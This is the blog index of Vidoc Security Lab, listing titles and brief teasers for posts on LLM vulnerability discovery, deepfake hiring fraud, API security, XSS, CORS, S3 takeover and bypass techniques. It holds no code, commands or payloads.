VIDOC
ProductPricingAboutCareerBlog

LLMs Became Dangerously Good for Cybersecurity – See Why >>
NEW|July 29, 2025

LLMs became dangerously good for cybersecurity

LLMs can now reliably spot real-world zero-day vulnerabilities through brute-force patience – this deep-dive explains why that's both impressive and a...

DM
Dawid Moczadło
Arrow

LLMs became dangerously good for cybersecurity

LLMs can now reliably spot real-world zero-day vulnerabilities through brute-force patience – this deep-dive explains why that's both impressive and a...

NEW|1 min read|Dawid Moczadło
DM

Join our newsletter.
No fluff, just facts.

VIDOC

Vulnerability management that works.

ProductAboutPricing
CareerBloge-Book
Contact usPrivacy Policy

© 2025 Vidoc Security Lab

Date ↓
Read Time
Filter
Date ↓
Read Time
JUL 29, 2025   |   1 MIN READ

LLMs became dangerously good for cybersecurity

LLMs can now reliably spot real-world zero-day vulnerabilities through brute-force patience – this deep-dive explains why that's both impressive and alarming.

DM
Dawid Moczadło
Fake Engineer - Advanced Deepfake Fraud and How to Detect It
MAR 27, 2025   |   2 MIN READ

Fake Engineer - Advanced Deepfake Fraud and How to Detect It

The candidate applied for an open backend position at our company Vidoc Security Lab. He had a decent CV and LinkedIn profile but used a deepfake during the coding interview, pretending to be a different person. This incident could be linked to a North Korean hacker group that has used this trick with many other companies.

K
Klaudia
API Security: Best Practices for Python Developers - Part II
JUN 11, 2024   |   2 MIN READ

API Security: Best Practices for Python Developers - Part II

Part II of the Developer's Guide for a secure API implementation. Devs are the core of web applications, that's why you should continue learning how to prevent common attacks and secure your endpoints correctly. Avoid deploying vulnerable code by taking into account these Security Best Practices.

OO
Oriana Olivetti
Why Dependency Security Is Your First Line of Defense Against Cyber Threats
MAY 29, 2024   |   1 MIN READ

Why Dependency Security Is Your First Line of Defense Against Cyber Threats

Explore the technical essentials of Software Composition Analysis (SCA) and dependency scanning, crucial tools for securing software against cyber threats in AI-driven development environments.

OO
Oriana Olivetti
Beginner's Guide to Client Prototype Pollution Vulnerabilities
MAY 15, 2024   |   1 MIN READ

Beginner's Guide to Client Prototype Pollution Vulnerabilities

The perfect introduction for those wanting to understand Prototype Pollution vulnerabilities and exploits. Because not everyone knows how Objects in JavaScript work, but we are about to change that! Are you up for the challenge?

OO
Oriana Olivetti
Pentesting Cross-Origin Resource Sharing (CORS) Vulnerabilities
APR 30, 2024   |   1 MIN READ

Pentesting Cross-Origin Resource Sharing (CORS) Vulnerabilities

Beginners guide to this common security misconfiguration. Here you'll find the steps to quickly spot and exploit CORS vulnerabilities out in the wild. Shall we start?

OO
Oriana Olivetti
State of Security Automation
APR 9, 2024   |   1 MIN READ

State of Security Automation

SAST tools overlook more than 85% of CVEs in real-world scenarios. Outdated security automation can't keep pace with rapid code development. There is the hidden cost of security automation - validating false positives.

DM
Dawid Moczadło
The Developer's Guide to Effective Secrets Management
APR 2, 2024   |   1 MIN READ

The Developer's Guide to Effective Secrets Management

Discover how to safeguard your applications with effective secrets management. Learn about the challenges of secrets detection and how Vidoc Security Lab's AI Security Engineer can revolutionize your security measures against AI-generated code threats.

OO
Oriana Olivetti
API Security: Best Practices for Python Developers - Part I
MAR 26, 2024   |   2 MIN READ

API Security: Best Practices for Python Developers - Part I

Developer's Guide for a secure API implementation. Devs are the core of web applications, however, they are also the ones who end up introducing and deploying vulnerabilities that later get exploited. That's why you should know how to prevent common attacks and secure your endpoints correctly.

OO
Oriana Olivetti
SAST vs. DAST: Choosing the Right Security Testing for Your Project
MAR 14, 2024   |   1 MIN READ

SAST vs. DAST: Choosing the Right Security Testing for Your Project

Distinguishing between SAST & DAST is crucial for any robust security strategy. Adopting a unified approach, by leveraging both scans, ensures that your software remains secure during its lifecycle, effectively mitigating potential risks and vulnerabilities in today's fast-paced digital environment.

OO
Oriana Olivetti
AI Pentesting vs Automated Penetration Testing
FEB 29, 2024   |   1 MIN READ

AI Pentesting vs Automated Penetration Testing

In the rapidly evolving cybersecurity landscape, where the emergence of AI-generated code presents unprecedented challenges, the concept of automated penetration testing emerges as a beacon of innovation and efficiency.

OO
Oriana Olivetti
Why you never get Reflected XSS to execute: Balancing Payloads
FEB 20, 2024   |   2 MIN READ

Why you never get Reflected XSS to execute: Balancing Payloads

Beginners guide to Reflected XSS. Everyone talks about the different XSS cheatsheets, and then you are supposed to try them one by one to see if any of the payloads get executed on your target. We don't like that. It's time-consuming and a mindless task.

OO
Oriana Olivetti
AWS S3 Bucket Takeover - how to find it and maximize impact?
JAN 10, 2024   |   1 MIN READ

AWS S3 Bucket Takeover - how to find it and maximize impact?

The impact of an AWS S3 Bucket Takeover can range from none, account takeover, and even up to RCE. In this article, we'll tell you how to find it and maximize its impact

G
Greg
Security of new features in Next.js 14 - Server Actions, Taints
OCT 30, 2023   |   1 MIN READ

Security of new features in Next.js 14 - Server Actions, Taints

Next.js 14 (and 13) introduced many attack vectors without providing the tooling necessary for organizations to detect them. It is easier than ever before to expose server secrets, introduce unauthenticated "endpoints" or any other issue that will make you vulnerable

DM
Dawid Moczadło
Escalating debug mode in Django to RCE, SSRF, SQLi
OCT 24, 2023   |   1 MIN READ

Escalating debug mode in Django to RCE, SSRF, SQLi

Security implications of DEBUG=true in Django. Learnings from an ethical hacker's perspective

DM
Dawid Moczadło
Vidoc Secures Funding from bValue!
SEP 27, 2023   |   1 MIN READ

Vidoc Secures Funding from bValue!

Vidoc Security Lab has secured an investment from bValue, a leading player in the world of venture capital and technology innovation

K
Klaudia
Vidoc - Notifications and Collab Feature Release
JUN 6, 2023   |   1 MIN READ

Vidoc - Notifications and Collab Feature Release

We implemented Notification and Collaboration features. How it works and how it can benefit your research

K
Klaudia
Ultimate 401 and 403 bypass methods
MAY 9, 2023   |   3 MIN READ

Ultimate 401 and 403 bypass methods

As a security researcher, I absolutely love the rush of discovering a suspicious endpoint during reconnaissance (which is super easy with Vidoc Research tool ;). It's exciting to think that you might have stumbled upon something important. However, that excitement can quickly turn into frustration when you're met with a 401 or 403 HTTP response code. Trust me, I've been there. But, over time, I've learned that there are ways to work around these error codes. I want to share some practical tips and techniques that I learned doing research, along with links to modules you can run in Vidoc Research to try to bypass 401 and 403.

K
Klaudia
How we made $120k bug bounty in a year with good automation
FEB 6, 2023   |   1 MIN READ

How we made $120k bug bounty in a year with good automation

2022 was very busy for several reasons, today we want to present to you what we did and learned doing large-scale bug bounty hunting

K
Klaudia
Introducing the New and Improved Web-Based Security Tool
FEB 1, 2023   |   1 MIN READ

Introducing the New and Improved Web-Based Security Tool

TL;DR; We improved Active Recon and data search option, changed payments system to subscription model, introduced Module-based security scanning with nuclei-like templates, and introduced Module Editor.

K
Klaudia
Why good Recon is hard, and how we make it easy
NOV 3, 2022   |   2 MIN READ

Why good Recon is hard, and how we make it easy

What sucks the most about doing recon? It all started with that one tweet ;) Inspired by Greg's post we decided to write a summary of common problems with Recon and why Vidoc Research - our tool for security researchers - solves them all.

K
Klaudia
Vidoc - a hacking platform
SEP 24, 2022   |   2 MIN READ

Vidoc - a hacking platform

TL;DR Vidoc platform will allow you to find new targets, test your payloads and collaborate with other professionals. The application security recon tool and scanner we are working on is dedicated to modern web applications. Our goal is to make big scale research affordable and easy for everybody.

K
Klaudia
Hacking Swagger-UI - from XSS to account takeovers
MAY 16, 2022   |   1 MIN READ

Hacking Swagger-UI - from XSS to account takeovers

We have reported more than 60 instances of this bug across a wide range of bug bounty programs including companies like Paypal, Atlassian, Microsoft, GitLab, Yahoo, ...

DM
Dawid Moczadło